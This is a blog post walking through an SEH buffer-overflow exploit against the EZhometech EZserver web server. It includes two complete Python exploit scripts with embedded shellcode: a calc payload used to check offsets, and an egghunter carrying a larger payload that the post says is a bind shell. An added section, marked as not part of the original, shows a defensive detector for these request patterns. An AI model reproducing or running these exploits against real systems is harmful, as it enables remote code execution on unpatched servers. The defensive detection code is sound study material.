
Wednesday, October 3, 2012

Exploit EZhometech EZserver (SEH Buffer Overflow) Part.2

In this part I continue from the previous case, where the telnet (bind shell) payload failed: the available memory space was too small, so the payload never landed.
See the picture below:

As shown above, the available memory space is 236 bytes, while the shellcode is 344 bytes, so the shellcode cannot fit there. Therefore I need to use the egghunter method.

- Next, test the fuzzer.
Before going further, I want to verify that the fuzzer and its offsets are correct, so here I use a shellcode that launches the calculator. You can generate it with Metasploit. The shellcode is the one embedded in the fuzzer below.


Enter it into the fuzzer:

#!/usr/bin/python
import socket
ip_address="192.168.56.101"
port=8000
buffer ="\x90" * 5879 #NOP sled up to the nSEH offset
buffer+="\xeb\x06\x90\x90" #JMP SHORT (nSEH)
buffer+="\x96\x96\x20\x10" #Overwrite address of MSVCRTD.dll (SEH)
buffer+="\x90" * 16 #break
buffer+=("\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x59"
"\x90\x14\x8c\x83\xeb\xfc\xe2\xf4\xa5\x78\x50\x8c\x59\x90\x9f\xc9"
"\x65\x1b\x68\x89\x21\x91\xfb\x07\x16\x88\x9f\xd3\x79\x91\xff\xc5"
"\xd2\xa4\x9f\x8d\xb7\xa1\xd4\x15\xf5\x14\xd4\xf8\x5e\x51\xde\x81"
"\x58\x52\xff\x78\x62\xc4\x30\x88\x2c\x75\x9f\xd3\x7d\x91\xff\xea"
"\xd2\x9c\x5f\x07\x06\x8c\x15\x67\xd2\x8c\x9f\x8d\xb2\x19\x48\xa8"
"\x5d\x53\x25\x4c\x3d\x1b\x54\xbc\xdc\x50\x6c\x80\xd2\xd0\x18\x07"
"\x29\x8c\xb9\x07\x31\x98\xff\x85\xd2\x10\xa4\x8c\x59\x90\x9f\xe4"
"\x65\xcf\x25\x7a\x39\xc6\x9d\x74\xda\x50\x6f\xdc\x31\x60\x9e\x88"
"\x06\xf8\x8c\x72\xd3\x9e\x43\x73\xbe\xf3\x75\xe0\x3a\x90\x14\x8c") #calc shellcode
buffer+="\x90" * (5954 -len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((ip_address,port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Sending Fuzzer . . . !")
sock.close()

Open the application, run the fuzzer, and see what happens:

As seen above, the shellcode executed and launched the calculator, which means the fuzzer and the offsets are correct.

- After that, it is time to use the egghunter method.
The layout of the egghunter payload is:
{NOP + w00tw00t + shellcode + Break (NOP1) + JMP SHORT + Address of .dll + Break (NOP2) + hunt}

#!/usr/bin/python
import socket
ip_address="192.168.56.101"
port=8000
hunt =("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x77\x30\x30\x74"
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
buffer ="\x90" * 5447 #NOP sled
shellcode=("\x31\xc9\xb1\x51\xda\xd4\xba\xcc\xd6\xc2\x2c\xd9\x74\x24\xf4\x58"
"\x31\x50\x13\x83\xc0\x04\x03\x9c\xd9\x20\xd9\xe0\x8c\x4f\x6f\xf0"
"\xa8\x6f\x8f\xff\x2b\x1b\x1c\xdb\x8f\x90\x98\x1f\x5b\xda\x27\x27"
"\x5a\xcc\xa3\x98\x44\x99\xeb\x06\x74\x76\x5a\xcd\x42\x03\x5c\x3f"
"\x9b\xd3\xc6\x13\x58\x13\x8c\x6c\xa0\x5e\x60\x73\xe0\xb4\x8f\x48"
"\xb0\x6e\x58\xdb\xdd\xe4\xc7\x07\x1f\x10\x91\xcc\x13\xad\xd5\x8d"
"\x37\x30\x01\x32\x64\xb9\x5c\x58\x50\xa1\x3f\x63\xa9\x02\xdb\xe8"
"\x89\x84\xaf\xae\x01\x6e\xdf\x32\xb7\xfb\x60\x42\x99\x93\xee\x1c"
"\x2b\x88\xbf\x5f\xe5\x36\x13\xf9\x62\x84\xa1\x6d\x04\x99\xf7\x32"
"\xbe\xa2\x28\xa4\xf5\xb0\x35\x0f\x5a\xb4\x10\x30\xd3\xaf\xfb\x4f"
"\x0e\x27\x06\x1a\xbb\x3a\xf9\x74\x53\xe2\x0c\x81\x09\x43\xf0\xbf"
"\x01\x3f\x5d\x6c\xf5\xfc\x32\xd1\xaa\xfd\x65\xb3\x24\x13\xda\x5d"
"\xe6\x9a\x03\x34\x60\x39\xd9\x46\xb6\x16\x21\x70\x52\x89\x8c\x29"
"\x5c\x79\x46\x75\x0f\x54\x7e\x22\xaf\x7f\xd3\x99\xb0\x50\xbc\xc4"
"\x06\xd7\x74\x51\x66\x01\xd6\x09\xcc\xfb\x28\x61\x7f\x6b\x30\xf8"
"\x46\x15\xe9\x05\x90\xb3\xea\x29\x7b\x56\x71\xaf\xec\xc5\x14\xa6"
"\x08\x63\xb7\xe1\xfb\xb8\xbe\xf6\x96\x04\x48\x1a\x57\x45\xb9\x70"
"\x66\x07\x13\x7a\xd5\xa4\xf8\x0f\xa0\x8c\x55\xa4\xfe\x85\xdb\x44"
"\xb3\x40\xe3\xcd\xf0\x93\xcd\x76\xae\x39\xa3\xd9\x01\xd4\x42\x88"
"\xf0\x7d\x14\xd5\x23\x15\x3b\xf0\xc1\x28\x10\xfd\x1c\xde\x68\xfe"
"\x96\xe0\x47\x8b\x8e\xe2\xeb\x4f\x54\xe4\x3a\x1d\x6a\xca\xab\xdf"
"\x4c\x09\x58\x4c\x92\x18\x60\xa2")
buffer+="w00tw00t" #egg tag searched for by the hunter
buffer+=shellcode
buffer+="\x90" * 80 #break
buffer+="\xeb\x06\x90\x90" #JMP SHORT
buffer+="\x96\x96\x20\x10" #Overwrite address of MSVCRTD.dll
buffer+="\x90" * 32 #break
buffer+=hunt
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((ip_address,port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Sending Fuzzer . . . !")
sock.close()
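Both fuzzers above expose the same on-the-wire indicators: a request line thousands of bytes long, a long 0x90 sled, the nSEH "\xeb\x06\x90\x90" pattern and, in the egghunter version, the w00tw00t tag. The following is an added example (not code from the original post) of a minimal defender-side check over captured requests; the thresholds and the inert 0xCC filler in the sample are assumptions.

```python
import re

EGG_TAG = b"w00tw00t"             # egg marker used by the post's egghunter
JMP_SHORT = b"\xeb\x06\x90\x90"   # nSEH overwrite pattern used in both fuzzers
MAX_REQUEST_LINE = 2048           # assumed sane request-line limit (not from the post)


def request_line_findings(raw, max_len=MAX_REQUEST_LINE):
    """Return the indicator names found in the first line of a raw HTTP
    request (bytes). An empty list means nothing suspicious was seen."""
    line = raw.split(b"\r\n", 1)[0]
    findings = []
    if len(line) > max_len:
        findings.append("oversized-request-line")
    if re.search(rb"\x90{32,}", line):       # long NOP sled
        findings.append("nop-sled")
    if EGG_TAG in line:
        findings.append("egg-tag")
    if JMP_SHORT in line:
        findings.append("seh-jmp-short")
    binary = sum(1 for b in line if b < 0x20 or b > 0x7e)
    if line and binary / len(line) > 0.3:   # mostly non-printable bytes
        findings.append("binary-heavy")
    return findings


def build_benign():
    # Constructed ordinary request for comparison.
    return b"GET /index.html HTTP/1.1\r\nHost: example\r\n\r\n"


def build_layout_sample():
    # Constructed sample reproducing only the byte layout the post describes
    # (NOP + w00tw00t + shellcode + break + JMP SHORT + address + break + hunt),
    # with the shellcode and hunter replaced by inert 0xCC filler.
    buf = b"\x90" * 5447
    buf += EGG_TAG
    buf += b"\xcc" * 344          # stands in for the 344-byte shellcode
    buf += b"\x90" * 80           # break
    buf += JMP_SHORT              # nSEH
    buf += b"\x96\x96\x20\x10"    # SEH address used by the post
    buf += b"\x90" * 32           # break
    buf += b"\xcc" * 32           # stands in for the hunter
    buf += b"\r\n\r\n"
    return b"GET /" + buf + b"HTTP/1.1"
```

Run `request_line_findings` over each request line in a capture of traffic to port 8000; a request that trips several of these indicators at once is worth alerting on.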

And then......


Done



1 comment:

  1. I Need Help Here
    Mail=nertilalba@gmail.com
